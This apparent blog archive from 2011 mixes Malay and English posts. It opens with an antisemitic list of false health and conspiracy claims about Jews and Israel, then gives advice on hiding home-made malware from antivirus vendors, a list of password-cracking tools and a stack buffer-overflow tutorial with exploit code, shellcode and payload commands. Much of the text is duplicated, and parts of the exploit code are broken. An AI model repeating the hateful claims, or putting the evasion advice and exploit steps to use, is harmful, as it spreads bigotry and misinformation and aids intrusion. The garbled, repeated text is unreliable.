Thursday, October 20, 2011
10 perkara yahudi taknak kita tahu!
8:39 AM
No comments
Tahukah korang sebenarnya banyak benda yang yahudi laknat ni sembunyikan pada pe...ngetahuan umum. Jom MK nak dedahkan 10 daripadanya!
1) Israel merupakan salah satu pembekal rokok terbesar dunia, namun rakyatnya tidak digalakkan menghisap rokok yang mereka cipta kerana mereka tahu akan bahana dalam kandungannya!.
2) Israel mempunyai kepakaran dalam mencipta vaksin dan mahir dalam ilmu perubatan, namun ilmu itu hanya untuk orang luar, kerana mereka tahu bahan kimia yang terdapat dalam ubat akan merosakkan untuk satu jangka masa panjang. Penduduk israel sendiri menggunakan Habbatus Sauda dalam perubatan harian.
3) Taktik kaum ibu di Israel ketika mengandung ialah si ibu/ isteri akan mendengar si suami membaca, menyanyi atau mereka akan menyelesaikan masalah matematik bersama-sama untuk mendapat bayi yang bijak dan petah kerana pada ketika ini fikiran dan perasaan si isteri adalah bersambungan dengan anak dalam kandungan berbanding anda bercakap padanya di perut.
4) McDonald di israel telah membuat pengubahsuaian contohnya dari segi minuman. Mereka menggantikan kopi berkafein kepada teh yang mengandungi polyphenols, iaitu unsur kimia yang berfungsi sebagai antioksidan berkekuatan besar untuk membuang sel rosak dan mencegah kanser. Kita disini masih lagi menggunakan KAFEIN BERBAHAYA!
5) Di Israel, mereka akan memakan buah-buahan dahulu sebelum memakan makanan utama. Ini kerana hakikatnya dengan memakan hidangan kabohidrat (nasi atau roti) dahulu kemudian buah buahan akan menyebabkan kita merasa ngantuk dan lemah dan payah untuk memahami pelajaran disekolah. Sedangkan disini kita dimomokkan dengan memakan buah-buahan sebagai pencuci mulut.
6) Israel terus melakukan berbagai usaha untuk menghancurkan Masjid Al Aqsha dan Qubah Shakhrah sejak 50 tahun yang lalu dengan menggali bawah tanah masjid tersebut agar runtuh dengan sendirinya?
7) Majoriti buku sejarah di dunia mengatakan Negara-negara Arab yang menyerang Israel terlebih dahulu pada perang tahun 1967? Padahal faktanya, Israel yang menyerang Negara-negara Arab terlebih dahulu kemudian mereka merebut kota Al Quds dan Tebing Barat? Tetapi mereka mengatakan serangannya itu adalah serangan untuk menjaga diri dan antisipasi?
8 ) Di Palestin, penduduk kristian Palestin dan Palestin Muslim bersatu melawan penjajah yahudi
9) Pelajar-pelajar di sekolah dilatih dengan taktik ketenteraan dalam bersukan seperti menembak dan mamanah bagi melatih otak memfokus sesuatu perkara dan mempersiapkan diri jika perkhidmatan diperlukan dimasa akan datang.
10) Hosni Mubarak merupakan tulang belakang Israel dan Amerika selama 30 tahun!
1) Israel merupakan salah satu pembekal rokok terbesar dunia, namun rakyatnya tidak digalakkan menghisap rokok yang mereka cipta kerana mereka tahu akan bahana dalam kandungannya!.
2) Israel mempunyai kepakaran dalam mencipta vaksin dan mahir dalam ilmu perubatan, namun ilmu itu hanya untuk orang luar, kerana mereka tahu bahan kimia yang terdapat dalam ubat akan merosakkan untuk satu jangka masa panjang. Penduduk israel sendiri menggunakan Habbatus Sauda dalam perubatan harian.
3) Taktik kaum ibu di Israel ketika mengandung ialah si ibu/ isteri akan mendengar si suami membaca, menyanyi atau mereka akan menyelesaikan masalah matematik bersama-sama untuk mendapat bayi yang bijak dan petah kerana pada ketika ini fikiran dan perasaan si isteri adalah bersambungan dengan anak dalam kandungan berbanding anda bercakap padanya di perut.
4) McDonald di israel telah membuat pengubahsuaian contohnya dari segi minuman. Mereka menggantikan kopi berkafein kepada teh yang mengandungi polyphenols, iaitu unsur kimia yang berfungsi sebagai antioksidan berkekuatan besar untuk membuang sel rosak dan mencegah kanser. Kita disini masih lagi menggunakan KAFEIN BERBAHAYA!
5) Di Israel, mereka akan memakan buah-buahan dahulu sebelum memakan makanan utama. Ini kerana hakikatnya dengan memakan hidangan kabohidrat (nasi atau roti) dahulu kemudian buah buahan akan menyebabkan kita merasa ngantuk dan lemah dan payah untuk memahami pelajaran disekolah. Sedangkan disini kita dimomokkan dengan memakan buah-buahan sebagai pencuci mulut.
6) Israel terus melakukan berbagai usaha untuk menghancurkan Masjid Al Aqsha dan Qubah Shakhrah sejak 50 tahun yang lalu dengan menggali bawah tanah masjid tersebut agar runtuh dengan sendirinya?
7) Majoriti buku sejarah di dunia mengatakan Negara-negara Arab yang menyerang Israel terlebih dahulu pada perang tahun 1967? Padahal faktanya, Israel yang menyerang Negara-negara Arab terlebih dahulu kemudian mereka merebut kota Al Quds dan Tebing Barat? Tetapi mereka mengatakan serangannya itu adalah serangan untuk menjaga diri dan antisipasi?
8 ) Di Palestin, penduduk kristian Palestin dan Palestin Muslim bersatu melawan penjajah yahudi
9) Pelajar-pelajar di sekolah dilatih dengan taktik ketenteraan dalam bersukan seperti menembak dan mamanah bagi melatih otak memfokus sesuatu perkara dan mempersiapkan diri jika perkhidmatan diperlukan dimasa akan datang.
10) Hosni Mubarak merupakan tulang belakang Israel dan Amerika selama 30 tahun!
7 PERKARA GANJIL...
8:37 AM
No comments
7 PERKARA GANJIL...
Terdapat seorang pemuda yang kerjanya menggali kubur dan m...encuri kain kafan untuk dijual. Pada suatu hari, pemuda tersebut berjumpa dengan seorang ahli ibadah untuk menyatakan kekesalannya dan keinginan untuk bertaubat kepada Allah s. w. t. Dia berkata, "Sepanjang aku menggali kubur untuk mencuri kain kafan, aku telah melihat 7 perkara ganjil yang menimpa mayat-mayat tersebut. Lantaran aku merasa sangat insaf atas perbuatanku yang sangat keji itu dan ingin sekali bertaubat."
" Golongan yang pertama, aku lihat mayat yang pada siang harinya menghadap kiblat. Tetapi pabila aku menggali semula kuburnya pada waktu malam, aku lihat wajahnya telahpun membelakangkan kiblat. Mengapa terjadi begitu, wahai tuan guru?" tanya pemuda itu. " Wahai anak muda, mereka itulah golongan yang telah mensyirikkan Allah s. w. t. sewaktu hidupnya. Lantaran Allah s. w. t. menghinakan mereka dengan memalingkan wajah mereka dari mengadap kiblat, bagi membezakan mereka daripada golongan muslim yang lain," jawab ahli ibadah tersebut.
Sambung pemuda itu lagi, " Golongan yang kedua, aku lihat wajah mereka sangat elok semasa mereka dimasukkan ke dalam liang lahad. Tatkala malam hari ketika aku menggali kubur mereka, ku lihat wajah mereka telahpun bertukar menjadi babi. Mengapa begitu halnya, wahai tuan guru?" Jawab ahli ibadah tersebut, " Wahai anak muda, mereka itulah golongan yang meremehkan dan meninggalkan solat sewaktu hidupnya. Sesungguhnya solat merupakan amalan yang pertama sekali dihisab. Jika sempurna solat, maka sempurnalah amalan-amalan kita yang lain,"
Pemuda itu menyambung lagi, " Wahai tuan guru, golongan yang ketiga yang aku lihat, pada waktu siang mayatnya kelihatan seperti biasa sahaja. Apabila aku menggali kuburnya pada waktu malam, ku lihat perutnya terlalu gelembung, keluar pula ulat yang terlalu banyak daripada perutnya itu." " Mereka itulah golongan yang gemar memakan harta yang haram, wahai anak muda," balas ahli ibadah itu lagi.
" Golongan keempat, ku lihat mayat yang jasadnya bertukar menjadi batu bulat yang hitam warnanya. Mengapa terjadi begitu, wahai tuan guru?" Jawab ahli ibadah itu, " Wahai pemuda, itulah golongan manusia yang derhaka kepada kedua ibu bapanya sewaktu hayatnya. Sesungguhnya Allah s. w. t. sama sekali tidak redha kepada manusia yang menderhakai ibu bapanya."
" Golongan kelima, ku lihat ada pula mayat yang kukunya amat panjang, hingga membelit-belit seluruh tubuhnya dan keluar segala isi dari tubuh badannya," sambung pemuda itu. " Anak muda, mereka itulah golongan yang gemar memutuskan silaturrahim. Semasa hidupnya mereka suka memulakan pertengkaran dan tidak bertegur sapa lebih daripada 3 hari. Bukankah Rasulullah s. a. w. pernah bersabda, bahawa sesiapa yang tidak bertegur sapa melebihi 3 hari bukanlah termasuk dalam golongan umat baginda," jelas ahli ibadah tersebut.
" Wahai guru, golongan yang keenam yang aku lihat, sewaktu siangnya lahadnya kering kontang. Tatkala malam ketika aku menggali semula kubur itu, ku lihat mayat tersebut terapung dan lahadnya dipenuhi air hitam yang amat busuk baunya," " Wahai pemuda, itulah golongan yang memakan harta riba sewaktu hayatnya," jawab ahli ibadah tadi.
" Wahai guru, golongan yang terakhir yang aku lihat, mayatnya sentiasa tersenyum dan berseri-seri pula wajahnya. Mengapa demikian halnya wahai tuan guru?" tanya pemuda itu lagi. Jawab ahli ibadah tersebut, " Wahai pemuda, mereka itulah golongan manusia yang berilmu. Dan mereka beramal pula dengan ilmunya sewaktu hayat mereka. Inilah golongan yang beroleh keredhaan dan kemuliaan di sisi Allah s. w. t. baik sewaktu hayatnya mahupun sesudah matinya."
Ingatlah, sesungguhnya daripada Allah s. w. t kita datang dan kepadaNya jualah kita akan kembali. Kita akan dipertanggungjawabkan atas setiap amal yang kita lakukan, hatta amalan sebesar zarah. Wallahua'lam..
Terdapat seorang pemuda yang kerjanya menggali kubur dan m...encuri kain kafan untuk dijual. Pada suatu hari, pemuda tersebut berjumpa dengan seorang ahli ibadah untuk menyatakan kekesalannya dan keinginan untuk bertaubat kepada Allah s. w. t. Dia berkata, "Sepanjang aku menggali kubur untuk mencuri kain kafan, aku telah melihat 7 perkara ganjil yang menimpa mayat-mayat tersebut. Lantaran aku merasa sangat insaf atas perbuatanku yang sangat keji itu dan ingin sekali bertaubat."
" Golongan yang pertama, aku lihat mayat yang pada siang harinya menghadap kiblat. Tetapi pabila aku menggali semula kuburnya pada waktu malam, aku lihat wajahnya telahpun membelakangkan kiblat. Mengapa terjadi begitu, wahai tuan guru?" tanya pemuda itu. " Wahai anak muda, mereka itulah golongan yang telah mensyirikkan Allah s. w. t. sewaktu hidupnya. Lantaran Allah s. w. t. menghinakan mereka dengan memalingkan wajah mereka dari mengadap kiblat, bagi membezakan mereka daripada golongan muslim yang lain," jawab ahli ibadah tersebut.
Sambung pemuda itu lagi, " Golongan yang kedua, aku lihat wajah mereka sangat elok semasa mereka dimasukkan ke dalam liang lahad. Tatkala malam hari ketika aku menggali kubur mereka, ku lihat wajah mereka telahpun bertukar menjadi babi. Mengapa begitu halnya, wahai tuan guru?" Jawab ahli ibadah tersebut, " Wahai anak muda, mereka itulah golongan yang meremehkan dan meninggalkan solat sewaktu hidupnya. Sesungguhnya solat merupakan amalan yang pertama sekali dihisab. Jika sempurna solat, maka sempurnalah amalan-amalan kita yang lain,"
Pemuda itu menyambung lagi, " Wahai tuan guru, golongan yang ketiga yang aku lihat, pada waktu siang mayatnya kelihatan seperti biasa sahaja. Apabila aku menggali kuburnya pada waktu malam, ku lihat perutnya terlalu gelembung, keluar pula ulat yang terlalu banyak daripada perutnya itu." " Mereka itulah golongan yang gemar memakan harta yang haram, wahai anak muda," balas ahli ibadah itu lagi.
" Golongan keempat, ku lihat mayat yang jasadnya bertukar menjadi batu bulat yang hitam warnanya. Mengapa terjadi begitu, wahai tuan guru?" Jawab ahli ibadah itu, " Wahai pemuda, itulah golongan manusia yang derhaka kepada kedua ibu bapanya sewaktu hayatnya. Sesungguhnya Allah s. w. t. sama sekali tidak redha kepada manusia yang menderhakai ibu bapanya."
" Golongan kelima, ku lihat ada pula mayat yang kukunya amat panjang, hingga membelit-belit seluruh tubuhnya dan keluar segala isi dari tubuh badannya," sambung pemuda itu. " Anak muda, mereka itulah golongan yang gemar memutuskan silaturrahim. Semasa hidupnya mereka suka memulakan pertengkaran dan tidak bertegur sapa lebih daripada 3 hari. Bukankah Rasulullah s. a. w. pernah bersabda, bahawa sesiapa yang tidak bertegur sapa melebihi 3 hari bukanlah termasuk dalam golongan umat baginda," jelas ahli ibadah tersebut.
" Wahai guru, golongan yang keenam yang aku lihat, sewaktu siangnya lahadnya kering kontang. Tatkala malam ketika aku menggali semula kubur itu, ku lihat mayat tersebut terapung dan lahadnya dipenuhi air hitam yang amat busuk baunya," " Wahai pemuda, itulah golongan yang memakan harta riba sewaktu hayatnya," jawab ahli ibadah tadi.
" Wahai guru, golongan yang terakhir yang aku lihat, mayatnya sentiasa tersenyum dan berseri-seri pula wajahnya. Mengapa demikian halnya wahai tuan guru?" tanya pemuda itu lagi. Jawab ahli ibadah tersebut, " Wahai pemuda, mereka itulah golongan manusia yang berilmu. Dan mereka beramal pula dengan ilmunya sewaktu hayat mereka. Inilah golongan yang beroleh keredhaan dan kemuliaan di sisi Allah s. w. t. baik sewaktu hayatnya mahupun sesudah matinya."
Ingatlah, sesungguhnya daripada Allah s. w. t kita datang dan kepadaNya jualah kita akan kembali. Kita akan dipertanggungjawabkan atas setiap amal yang kita lakukan, hatta amalan sebesar zarah. Wallahua'lam..
Tuesday, June 28, 2011
13 Free online backup and file sharing service
10:01 AM
No comments

13 Free online backup and file sharing service
If you are trying to get around the attachment size limits in email or simply want store your files off your computer to make sure that if disaster struck there is a backup copy stored somewhere else, there are a handful of free and paid services that make it easy to host your private files.
These online space can typically be accessed via web browser or a dedicated program. Besides your backup copy, if you move between computers or travel, you will also be able to get access to your precious files from anywhere with an internet connexion.
Dropbox: Dropbox will give you 2GB of free online storage space for your files.
Drop.io: Drop.io offers a great deal of customization, such as password protected file sharing, and choosing how long you want your files to be available.
Adrive: Adrive offers a huge 1 Terabyte of data storage to paying customers. Free accounts get a genereous 50GB of storage space online.
Syncplicity: Free users get 2GB of online space to store their files. They have business options available as well.
Wuala: With Wuala you need to offer part of your hard disk to store other people’s files and in exchange you can store your files on their computer. Everything is then encrypted and the files distributed accross multiple computers.
SpiderOak: This free online backup gives you 2GB of space, and it works with Windows Mac OS X and Linux.
Mozy: At Mozy you get 2GB of free online backup space. Like all the other services paid for larger storage space is available.
ZumoDrive: Online backup storage space for your photos, music and documents. Zumodrive gives you 2GB of storage space for free.
MyOherDrive: Receive 2GB of free online backup storage. It also allows file sharing of your files through links.
Backupify: It supports online backup of WordPress, Google docs, Picasa, Gmail, Flickr and many more. Free plan gives you 2GB of storage space.
SugarSync: The free 2GB of data storage online has some limitations but still good value for money
Fabrik: Currently only works in Windows as it needs you to download a backup client, but this will allow you to schedule backups. Frabrik gives you 2GB of online storage for free.
All of these services encrypt the data transfer from your computer to their servers, but some of them will not use encryption for storage. If you need a really secure encrypted storage data backup, to which not even the company can have access, then consider Secure Backup.
Secure Backup: Not free but it will store your data encrypted using AES256 bit, and not even the company can access it without your password which only you know and can not be retrieved by them.
Enjoy..........
How to check if a program is infected
9:49 AM
No comments

How to check if a program is infected
Hello all users heres some easy ways to find out if a program is infected or not without having to run the program. We know some of them you have already known.
1.Sandboxing:
Wikipedia describes a sandbox as: 'a security mechanism for safely running programs. It is often used to execute untested code, or untrusted programs from unverified third-parties, suppliers and untrusted users.' and this is exactly what it is.
A sandbox is an isolated work-space on a harddisk in which programs can be run without fear of infecting your PC.
Do you need to download a sandbox? No, in fact, I advise you use 'Anubis Sandbox', a free online sandbox. You upload your file to anubis, it runs it and tells you exactly what it does.
Anubis Sandbox
2. Vmware (most effective)
What is vmware? 'VM' stands for 'Virtual Machine', a virtual machine is an operating system complete with virtual hardware which runs on another operating system. An example of this is me running two Windows XP operating systems on one computer at the same time with the use of a vmware-based program. This means, we can run whatever we want in my second virtual Windows XP as it will not effect the rest of our PC.
A good free vmware program is 'Microsoft Virtual PC'.
For more information on vmware and how to use it, PM me.
3. Multi-Scanners
Do you need to download a sandbox? No, in fact, I advise you use 'Anubis Sandbox', a free online sandbox. You upload your file to anubis, it runs it and tells you exactly what it does.
Anubis Sandbox
2. Vmware (most effective)
What is vmware? 'VM' stands for 'Virtual Machine', a virtual machine is an operating system complete with virtual hardware which runs on another operating system. An example of this is me running two Windows XP operating systems on one computer at the same time with the use of a vmware-based program. This means, we can run whatever we want in my second virtual Windows XP as it will not effect the rest of our PC.
A good free vmware program is 'Microsoft Virtual PC'.
For more information on vmware and how to use it, PM me.
3. Multi-Scanners
Disclaimer: Never use any legitimate multi-scanners (such as virus total or jotti's malware scan) to scan programs you have crypted, packed, joined or created yourself as many of them then send the program to anti-virus companies which then add it to their signature dates.
Multi-scanners such as Virus Total, Jotti's malware scan and KIMS, scan a single program with multiple anti-viruses to see if any detect them as malware. This does NOT mean the program is definantly infected but does increase the chances (many hack tools are detected as malware when they are in fact not).
To scan crypted, packed, joined or home-made malware, ONLY use underground multi-scanners such as 'KIMS'.
Enjoy.......
A Brief Intro To Password Cracking
9:41 AM
No comments

A Brief Intro To Password Cracking
What is Password Cracking?
Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system.The purpose of password cracking might be to help a user recover a forgotten password , to gain unauthorized access to a system, or as a preventive measure by system administrators to check for easily crackable passwords.
What are the Common Methods?
1. Guessing
Easy Passwords can be sometimes guessed by people. These include most common passwords like The persons name, D.O.B, QWERTY, 123456, etc.
2. Bruteforcing
Many password cracker use this method to crack passwords. This method involves a software repeatedly trying out different combinations for logging into the system (or account).
3. Dictionary Attack
This method involves use of long lists of commonly used password lists or Username:Password combos or Wordlists for assisting Bruteforce. The software uses the data provided in this Sheet (text) to login to the system.
4. Social Engineering
This method involves interaction with the slave (or so told yet to be slave). In this method the Hacker asks the person many questions casually in a mindset to make him blurt out his password or atleast give a clue of it.
Suggestions to Prevent your password from getting cracked
* Using Alphabets , Numerals , Symbols in your passwords.
* Encrypting your passwords with Hashes like MD5.
* Installing a Captcha to stop bots.
These are a just few common methods.
Tools Required to Crack Passwords
Password Cracking Softwares:
- Brutus (Bruteforcer)
- John the Ripper (Bruteforcer)
- Aircrack (Wifi-WEP/WPA Cracking Tool)
- Cain and Abel (All In One)
- THC Hydra (Bruteforcer)
- L0phtcrack (Hash Cracker)
- Airsnort (WEP Encryption Cracking Tool)
- Solarwinds (Traffic Monitoring)
- PwDump (Windows Password Recovery Tool)
- Rainbow Crack (Hash Cracker)
Ultimate Password List (Dictionary)
Enjoy.......
What Is Buffer Overflow Attack (TUT)
9:39 AM
No comments

What Is Buffer Overflow Attack (TUT)
A Buffer Overflow is a flaw by which a program reacts abnormally when the memory buffers are overloaded, hence writing over adjacent memory. It can be triggered by using inputs that may alter the way a program operates,for example inputting a very large value in a c program which does integer based addition.
A buffer overflow can lead to program crash, memory access error, garbage outputs & worse, breach of system security. Probably, you might have seen prominent buffer overflow based exploits & attacks in Metaspl0it or any other spl0it framework. Why I am writing this ? well..I found an excellent article on buffer overflow by eXeCuTeR & thought you might wanna have a look at it. Its exlplained in quite easy language with very basic example.
read & learn..
Our vuln program:
---------- bof.c --------------
#include
#include
int main(int argc, char *argv[])
{
char str[10];
strcpy(str, argv[1]);
printf("Done");
return 0;
}
---------- bof.c --------------
As you see, argv[1] is copied to str (str can contains 10 characters)
Try to think - What happens when we load more than 10 bytes on str? You'll see.
Lets try compile the program and load 12 bytes:
niv@niv-desktop:~/Desktop$ gcc-3.3 bof.c -o bof
niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x12'`
Doneniv@niv-desktop:~/Desktop$
The program has been successfully compiled even though we loaded 12 bytes, which means 12 bytes aren't enough to overflow the program.
Lets try to overflow the program with 14 bytes:
niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x14'`
Doneniv@niv-desktop:~/Desktop$
Failed. Again.
Lets load 32 bytes this time:
niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x32'`
Segmentation fault (core dumped)
niv@niv-desktop:~/Desktop$
In case it says: /*** stack smashing detected ***/ or something that appears to be like this error, just go to the terminal, type: sudo apt-get install gcc-3.3 and when compiling it type gcc-3.3 example.c -o example instead of gcc example.c -o example.
We made it, we overflowed the program.
Now we'll check more further what exactly happend:
niv@niv-desktop:~/Desktop$ gdb -c core ./bof
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
/home/niv/Desktop/core: No such file or directory.
(gdb) run `perl -e 'print "A"x60'`
Starting program: /home/niv/Desktop/bof `perl -e 'print "A"x32'`
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r eip
eip 0x41414141 0x41414141
We overwrited the EIP with A's (A = 41 in hex) - The EIP is the Instructor Pointer, it points at the next instruction.
Now we can start writing our exploit.
Our exploit is gonna contain the NOPSLED + Shellcode + the address of the shellcode (the RET).
The NOPSLED is a chain of 0x90's (NOPSLED = NO OPeration) so the NOPSLED will be placed before our shellcode.
The NOPSLED helps us so we don't have to jump exactly to the place in memory where our shellcode begins.
---------- exploit.c --------------
#include
#include
char exploit[2048];
int main(void)
{
int i;
/*
* (linux/x86) eject cd-rom (follows "/dev/cdrom" symlink) + exit() - 40 bytes
* - izik
*/
char shellcode[] =
"\x6a\x05" // push $0x5
"\x58" // pop %eax
"\x31\xc9" // xor %ecx,%ecx
"\x51" // push %ecx
"\xb5\x08" // mov $0x8,%ch
"\x68\x64\x72\x6f\x6d" // push $0x6d6f7264
"\x68\x65\x76\x2f\x63" // push $0x632f7665
"\x68\x2f\x2f\x2f\x64" // push $0x642f2f2f
"\x89\xe3" // mov %esp,%ebx
"\xcd\x80" // int $0x80
"\x89\xc3" // mov %eax,%ebx
"\xb0\x36" // mov $0x36,%al
"\x66\xb9\x09\x53" // mov $0x5309,%cx
"\xcd\x80" // int $0x80
"\x40" // inc %eax
"\xcd\x80"; // int $0x80
for(i = 0; i < 512; i++)
strcat(exploit, "0x90");
strcat(exploit, shellcode);
printf("Loaded.\n");
return 0;
}
---------- exploit.c --------------
niv@niv-desktop:~/Desktop$ gcc-3.3 exploit.c -o exploit
niv@niv-desktop:~/Desktop$ ./exploit
Loaded.
Run our vuln program so we could find the RET, the address of our shellcode.
After we run it, we'll look for the ESP - the ESP points on the last element used on the stack.
Check this out:
niv@niv-desktop:~/Desktop$ gcc-3.3 exploit.c -o exploit
niv@niv-desktop:~/Desktop$ ./exploit
Loaded.
niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x60'`
Segmentation fault (core dumped)
niv@niv-desktop:~/Desktop$ gdb -c core ./bof
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
/home/niv/Desktop/core: No such file or directory.
(gdb) run `perl -e 'print "A"x60'`
Starting program: /home/niv/Desktop/bof `perl -e 'print "A"x60'`
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x/s $esp
You're gonna get these things:
0xbf949694: "`???}_???o??\002"
(gdb)
0xbf9496a2: ""
etc'...
Keep searching until you see something like this thing:
0xbf9496e0:"7?\224?J?\224?U?\224?i?\224?y?\224??\224?\002?\224?\024?\224?*?\224?3?\224???\224??\224?\v?\224?\030?\224?N?\224?Y?\224?q?\224???\224??\224???\224???\224?\025?\224?&?\224?;?\224?D?\224?W?\224?n?\224?v?\224?\205?\224???\224???\224?\024?\224?P?\224?p?\224?}?\224?\212?\224???\224??\224?"
0xbf9496e0 is the address of our shellcode (the RET)
To make our exploit work properly, we need to overwrite the EIP with our shellcode.We'll take our old address (0xbf9496e0) and do this thing:
Take our address and make it look this way: bf 94 96 e0
Grab the last bytes (e0) and do the following:
we'll block the characters between \'s (slashes), add x in each block -> \xe0\
you'll do the same to each 2 chars and then put them in order that the last bytes of our the address will be the first one in our new address:
0xbf9496e0 -> \xe0\x96\x94\xbf
Now, we are gonna reach our shellcode this way:
Since we overflowed the program with 32 bytes (32 A's),
and our RET's length is 4 bytes we are gonna subtract the length of our shellcode address(the RET) of the A's,
and we are gonna print 28 A's (32 A's - 4 bytes (RET's length) = 28) and the RET so we could reach the shellcode successfully.
niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x28'``printf
"\xbf\x94\x96\xe0"`
I suppose you already understood what's about to happen if you have read the exploit :)
read & learn..
Our vuln program:
---------- bof.c --------------
#include
#include
int main(int argc, char *argv[])
{
char str[10];
strcpy(str, argv[1]);
printf("Done");
return 0;
}
---------- bof.c --------------
As you see, argv[1] is copied to str (str can contains 10 characters)
Try to think - What happens when we load more than 10 bytes on str? You'll see.
Lets try compile the program and load 12 bytes:
niv@niv-desktop:~/Desktop$ gcc-3.3 bof.c -o bof
niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x12'`
Doneniv@niv-desktop:~/Desktop$
The program has been successfully compiled even though we loaded 12 bytes, which means 12 bytes aren't enough to overflow the program.
Lets try to overflow the program with 14 bytes:
niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x14'`
Doneniv@niv-desktop:~/Desktop$
Failed. Again.
Lets load 32 bytes this time:
niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x32'`
Segmentation fault (core dumped)
niv@niv-desktop:~/Desktop$
In case it says: /*** stack smashing detected ***/ or something that appears to be like this error, just go to the terminal, type: sudo apt-get install gcc-3.3 and when compiling it type gcc-3.3 example.c -o example instead of gcc example.c -o example.
We made it, we overflowed the program.
Now we'll check more further what exactly happend:
niv@niv-desktop:~/Desktop$ gdb -c core ./bof
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
/home/niv/Desktop/core: No such file or directory.
(gdb) run `perl -e 'print "A"x60'`
Starting program: /home/niv/Desktop/bof `perl -e 'print "A"x32'`
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r eip
eip 0x41414141 0x41414141
We overwrited the EIP with A's (A = 41 in hex) - The EIP is the Instructor Pointer, it points at the next instruction.
Now we can start writing our exploit.
Our exploit is gonna contain the NOPSLED + Shellcode + the address of the shellcode (the RET).
The NOPSLED is a chain of 0x90's (NOPSLED = NO OPeration) so the NOPSLED will be placed before our shellcode.
The NOPSLED helps us so we don't have to jump exactly to the place in memory where our shellcode begins.
---------- exploit.c --------------
#include
#include
char exploit[2048];
int main(void)
{
int i;
/*
* (linux/x86) eject cd-rom (follows "/dev/cdrom" symlink) + exit() - 40 bytes
* - izik
*/
char shellcode[] =
"\x6a\x05" // push $0x5
"\x58" // pop %eax
"\x31\xc9" // xor %ecx,%ecx
"\x51" // push %ecx
"\xb5\x08" // mov $0x8,%ch
"\x68\x64\x72\x6f\x6d" // push $0x6d6f7264
"\x68\x65\x76\x2f\x63" // push $0x632f7665
"\x68\x2f\x2f\x2f\x64" // push $0x642f2f2f
"\x89\xe3" // mov %esp,%ebx
"\xcd\x80" // int $0x80
"\x89\xc3" // mov %eax,%ebx
"\xb0\x36" // mov $0x36,%al
"\x66\xb9\x09\x53" // mov $0x5309,%cx
"\xcd\x80" // int $0x80
"\x40" // inc %eax
"\xcd\x80"; // int $0x80
for(i = 0; i < 512; i++)
strcat(exploit, "0x90");
strcat(exploit, shellcode);
printf("Loaded.\n");
return 0;
}
---------- exploit.c --------------
niv@niv-desktop:~/Desktop$ gcc-3.3 exploit.c -o exploit
niv@niv-desktop:~/Desktop$ ./exploit
Loaded.
Run our vuln program so we could find the RET, the address of our shellcode.
After we run it, we'll look for the ESP - the ESP points on the last element used on the stack.
Check this out:
niv@niv-desktop:~/Desktop$ gcc-3.3 exploit.c -o exploit
niv@niv-desktop:~/Desktop$ ./exploit
Loaded.
niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x60'`
Segmentation fault (core dumped)
niv@niv-desktop:~/Desktop$ gdb -c core ./bof
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
/home/niv/Desktop/core: No such file or directory.
(gdb) run `perl -e 'print "A"x60'`
Starting program: /home/niv/Desktop/bof `perl -e 'print "A"x60'`
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x/s $esp
You're gonna get these things:
0xbf949694: "`???}_???o??\002"
(gdb)
0xbf9496a2: ""
etc'...
Keep searching until you see something like this thing:
0xbf9496e0:"7?\224?J?\224?U?\224?i?\224?y?\224??\224?\002?\224?\024?\224?*?\224?3?\224???\224??\224?\v?\224?\030?\224?N?\224?Y?\224?q?\224???\224??\224???\224???\224?\025?\224?&?\224?;?\224?D?\224?W?\224?n?\224?v?\224?\205?\224???\224???\224?\024?\224?P?\224?p?\224?}?\224?\212?\224???\224??\224?"
0xbf9496e0 is the address of our shellcode (the RET)
To make our exploit work properly, we need to overwrite the EIP with our shellcode.We'll take our old address (0xbf9496e0) and do this thing:
Take our address and make it look this way: bf 94 96 e0
Grab the last bytes (e0) and do the following:
we'll block the characters between \'s (slashes), add x in each block -> \xe0\
you'll do the same to each 2 chars and then put them in order that the last bytes of our the address will be the first one in our new address:
0xbf9496e0 -> \xe0\x96\x94\xbf
Now, we are gonna reach our shellcode this way:
Since we overflowed the program with 32 bytes (32 A's),
and our RET's length is 4 bytes we are gonna subtract the length of our shellcode address(the RET) of the A's,
and we are gonna print 28 A's (32 A's - 4 bytes (RET's length) = 28) and the RET so we could reach the shellcode successfully.
niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x28'``printf
"\xbf\x94\x96\xe0"`
I suppose you already understood what's about to happen if you have read the exploit :)
Enjoy.......
Subscribe to:
Posts (Atom)














